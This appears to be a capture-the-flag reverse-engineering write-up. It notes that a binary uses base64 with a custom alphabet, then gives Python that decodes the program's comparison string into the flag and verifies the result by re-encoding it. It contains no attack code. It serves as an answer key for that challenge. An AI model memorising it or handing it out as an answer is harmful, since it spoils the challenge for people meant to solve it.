https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185703620-1978643263.jpg
a2 = v21 = v11 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185703006-238430904.jpg
So this is base64 with a custom alphabet; decode it directly with a tool to get the flag
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185702523-729896810.gif
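The post decodes with an online tool. As an added example (my code, not from the post or the binary), here is the custom-alphabet decode in Python, done two ways: by translating the custom alphabet back to the standard one and using the stock decoder, and by regrouping the 6-bit indices into bytes by hand, which is what the binary's Encode() does in reverse. The alphabet and comparison string are the ones recovered from the binary above; `recover_flag` returns what they decode to.

```python
import base64

STD_TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# a2 as recovered from the binary: lowercase first, then uppercase
CUSTOM_TABLE = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
# the string the program compares the encoded input against
TARGET = "tgL0q1rgEZaZmdm0zwq4lweYzgeTngfHnI1ImMm5ltaXywnLowuYnJmWmx0="


def check_table(table):
    if len(table) != 64 or len(set(table)) != 64:
        raise ValueError("a base64 table needs 64 distinct characters")


def custom_b64decode(data, table=CUSTOM_TABLE):
    """Map each character of the custom table onto the standard one, then decode normally."""
    check_table(table)
    return base64.b64decode(data.translate(str.maketrans(table, STD_TABLE)))


def custom_b64encode(raw, table=CUSTOM_TABLE):
    check_table(table)
    return base64.b64encode(raw).decode().translate(str.maketrans(STD_TABLE, table))


def decode_by_bits(data, table=CUSTOM_TABLE):
    """Same result without the base64 module: each character is a 6-bit index into the
    table; concatenate the bits, cut into bytes, and drop the incomplete tail."""
    check_table(table)
    bits = "".join(f"{table.index(ch):06b}" for ch in data.rstrip("="))
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def recover_flag(target=TARGET, table=CUSTOM_TABLE):
    """Decode the comparison string; both decoders and the re-encode must agree."""
    flag = custom_b64decode(target, table)
    if decode_by_bits(target, table) != flag or custom_b64encode(flag, table) != target:
        raise RuntimeError("table does not round-trip the target")
    return flag.decode()


if __name__ == "__main__":
    print(recover_flag())
```

The round-trip check in `recover_flag` is worth keeping when the alphabet was read off a decompiler: a table with one wrong character still decodes to something, but re-encoding the result will no longer reproduce the comparison string.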
